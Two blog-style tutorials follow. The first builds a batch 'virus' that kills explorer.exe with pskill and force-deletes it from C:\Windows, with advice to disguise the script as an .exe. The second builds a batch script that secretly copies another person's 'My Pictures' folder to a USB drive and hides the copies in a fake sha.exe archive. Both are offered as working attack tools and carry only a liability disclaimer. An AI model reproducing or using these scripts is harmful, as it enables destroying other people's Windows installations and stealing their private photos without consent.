1

Most simple & dangerous virus, I have ever created.


 As we all know, explorer.exe is an essential application that comes with our OS and is very necessary one. Without that application a normal user can’t do anything with his/her computer. With this concept, I just created a virus that damages the whole Operating System (OS) itself. That virus just deletes the application explorer.exe in c:\windows. But its not possible to delete the explorer.exe as the process ecplorer.exe is running in the computer. So, first we have to kill that process before deleting that application. Killing of that process can be done with the help of an application called pskill.exe which is available in the internet within the package PStools.  As usual open notepad to type the commands.
So, to kill the process explorer.exe, our first command should be this.
pskill.exe explorer.exe
Next thing we want to do is to delete the explorer.exe. As the explorer.exe is in c:\windows, the second command should be this.
del /f /q c:\Windows\explorer.exe
del is the command to delete, /f is to delete by forcing and /q is to execute the command in quite mode, and c:\Windows\explorer.exe is the file to delete. Now save the file as anything.bat. The application pskill.exe should be in the same folder as the .bat file is.
That’s all you want to do. Now the virus is ready to damage any windows PC. You can convert this application to .exe file so that no one will see the commands we typed. Don’t forget to pack the pskill.exe with the .bat file.
NOTE: Any proceedings and or activities related to the material contained within this article are exclusively your liability. The author will not be held responsible in the event any unlawful charges brought against any individuals by misusing the information in this article to any damage.

Feel free to comment this post.

0

Application to steal pictures from the ‘My Pictures’ folder.


 Our friends as well as our relatives will not allow us to copy their pictures in their computer. So, if we want their pictures, stealing is the only way to get that files. I have an application, that I created by myself to steal pictures from the ‘My Pictures’ folder. It’s just easy and amazing. You can also create that application by yourselves as these types of applications are not available on the internet. The only software you want to create this application is 7z.exe. If our friend/relative will see his/her pictures in our Pendrive, that we have stolen, he/she may scold us and may delete it too. So we want to hide that stolen pictures in our Pendrive.  First we want to make a folder in the Pendrive to copy all the pictures from the ‘My Pictures’ folder. S the command should be this:
md temp
Where md is the command to make directory. After the execution of this command, a new folder named ‘temp’ will be created. Now, we want to copy the pictures from the folder ‘my pictures’ to the folder temp. So the next command should be this.
copy "c:\users\%username%\pictures" %CD%\temp
where the copy is the command to copy files, %CD% denotes the Current Directory, %username% is a variable for the username, and ‘c:\users\%username%\pictures’ is the path to the my pictures. After the execution of the previous command, all the pictures in the folder ‘My Pictures’ will be copies to the folder ‘temp’. Now we have to hide all the pictures. We can just hide all the pictures by zipping all that files into an anything.exe file. Zipping can be done with the help of the application 7z.exe. So the next command should be this.
7z.exe a sha.exe %CD%\temp
Where a is the command to add files to the archive. Now the files are zipped into a file named sha.exe. Now we want to delete the files in the folder ‘temp’ that we have copied earlier. So the net command should be this.
del /q %CD%temp\*.*
Where del is the delete command and /q is for quite mode, and *.* denote all the files.
Now save the file as anything.bat. Now it’s ready to use. By running that anything.bat in the Pendrive, you will get a file named sha.exe. The only thing you want to do to get files inside sha.exe is to extract that file (sha.exe). Its just a small application,  but also an amazing one. Its 100% working because, I created it and was successful.


NOTE: Any proceedings and or activities related to the material contained within this article are exclusively your liability. The author will not be held responsible in the event any unlawful charges brought against any individuals by misusing the information in this article to any damage.



Feel free to comment this post.